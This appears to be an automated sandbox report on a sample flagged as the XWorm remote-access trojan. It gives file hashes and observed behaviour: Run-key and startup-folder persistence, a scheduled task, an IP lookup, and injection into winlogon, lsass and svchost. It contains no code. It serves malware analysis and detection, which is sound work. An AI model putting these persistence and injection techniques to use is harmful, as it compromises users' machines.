SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 00:17

Reported

2024-05-27 00:22

Platform

win10-20240404-en

Max time kernel

300s

Max time network

306s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4052 created 560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-Powershell = "C:\\Users\\Admin\\$77-Powershell.exe" C:\Users\Admin\$77-Cheat.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\$77-Powershell c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 c:\windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4052 set thread context of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716769132" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 27 May 2024 00:18:53 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5EBEFE70-DFDA-4E14-92CD-1F42C9391953}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\$77-Cheat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A c:\windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A c:\windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 2156 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 2156 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 2156 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 2156 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4052 wrote to memory of 836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 836 wrote to memory of 560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 836 wrote to memory of 648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 836 wrote to memory of 748 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 912 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 992 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 836 wrote to memory of 368 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 376 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 412 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1052 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1072 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1104 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1200 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 836 wrote to memory of 1212 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
